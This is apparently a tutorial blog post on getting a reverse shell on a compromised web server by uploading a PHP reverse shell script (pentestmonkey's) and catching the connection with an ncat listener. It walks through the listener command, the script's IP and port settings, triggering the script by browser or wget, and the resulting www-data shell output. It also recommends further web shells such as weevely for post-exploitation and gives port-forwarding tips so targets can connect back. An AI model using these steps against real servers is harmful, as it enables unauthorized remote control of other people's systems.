Once you are able to gain access to a remote website or server such that you can upload any arbitrary file to it, the next thing you want to try out is get a shell on the system. If the system is running php then a php file can be uploaded to it which will give us a reverse shell. There are many web based shell scripts but getting a terminal based shell is far more neater.

To get a shell on the system all we need is a reverse shell php script and a commandline tool called netcat. There are many php reverse shell scripts out there and we are going to try a few of them in this post. The first one that we are going to try is from pentestmonkey. You can download it from the website or check this gist.

Along with that php script you need netcat. I prefer the ncat utility from nmap suite which is very featureful and cross platform as well. If you are new to netcat then I suggest you read up my tutorial on netcat first. Along with those 2 things you should also have apache+php installed to test the script and understand its working.

So first of all start a netcat listener. Reverse shells are based on the principle that the remote or hacked system will connect back to you. This back connection is accepted and handled by the netcat listener. Usage is simple

$ ncat -vv -n -l -p 1234

The above command is going to start a netcat listener on port number 1234. The l option means listener, the n option means no dns resolution, the p option means the port number and the vv option means verbose 2x. Once the listener starts ncat would report something like this

Ncat: Version 6.00 ( http://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234

Next thing to do is initiate the php script. The php reverse shell script you downloaded in the above step, copy it to your apache web directory so that you can access it from the browser. The script needs 2 important configurations. That is the ip address and the port number it needs to connect to.

$VERSION = "1.0"; $ip = '127.0.0.1'; // CHANGE THIS $port = 1234; // CHANGE THIS $chunk_size = 1400;

Change the ip address to the ip address of your own machine, or the machine on which netcat is running. In our case, its localhost so 127.0.0.1 would do. Port number should be the port netcat is listening to.

Now launch the script from a browser by opening the url http://localhost/reverse.php. reverse.php is the name of the script. The moment the script is opened in the browser netcat should receive the connection and show the details like this

Ncat: Connection from 127.0.0.1. Ncat: Connection from 127.0.0.1:59655. Linux enlightened-desktop 3.5.0-26-generic #42-Ubuntu SMP Fri Mar 8 23:18:20 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux 17:15:46 up 7:04, 4 users, load average: 0.08, 0.09, 0.14 USER TTY FROM [email protected] IDLE JCPU PCPU WHAT enlighte tty7 :0 10:11 7:04m 5:18 0.05s /bin/sh /usr/bi enlighte pts/0 :0 10:12 25:49 0.07s 0.00s ncat -vv -n -l enlighte pts/3 :0 10:12 7:03m 0.00s 4.32s kdeinit4: kded4 enlighte pts/4 :0 17:15 0.00s 0.07s 0.00s wget http://loc uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $

The last dollar sign indicates that the sh shell is ready to accept and run commands. The netcat output also shows some system details.

The browser wont show any output and would appear to load forever. The browser window can be closed and the shell would still remain running. This is because the script actually creates a separate process for the shell by forking. If you dont have a browser to trigger the php script, then use a commandline utility like wget to trigger the script.

$ wget http://localhost/reverse.php --2013-04-12 17:15:46-- http://localhost/reverse.php Resolving localhost (localhost)... 127.0.0.1 Connecting to localhost (localhost)|127.0.0.1|:80... connected. HTTP request sent, awaiting response...

Just like the browser, wget will keep waiting for some output from the script. Once netcat receives the connection close the wget session as well.

Other php reverse shell scripts

There is another php reverse shell script hosted at github. Find it here. It generates a password protected reverse shell script using a username/password configuration. Other configuration options include the ip address and the port. Upload it to the target system and launch from browser.

And then comes the most powerful one, called weevely.

Weevely is a PHP web shell that provides a telnet-like console to execute system commands and automatize administration and post-exploitation tasks.

Weevely has lots more inbuilt features that can automate various post exploitation tasks. In short, it is more than just a console. Check it out here.

Notes

Since the php script connects back to us, it is important that no firewall on our own system blocks it. For example a firewall like firestarter on linux or zonealarm on windows might block incoming connections like that. So first make sure that ports on your local system are reachable and connectable. Also if you are on a LAN behind a router then you need to configure port forwarding properly.

To test your ports, after launching netcat listener use this port testing tool. If your ports are connectable from the outer internet then they are OK.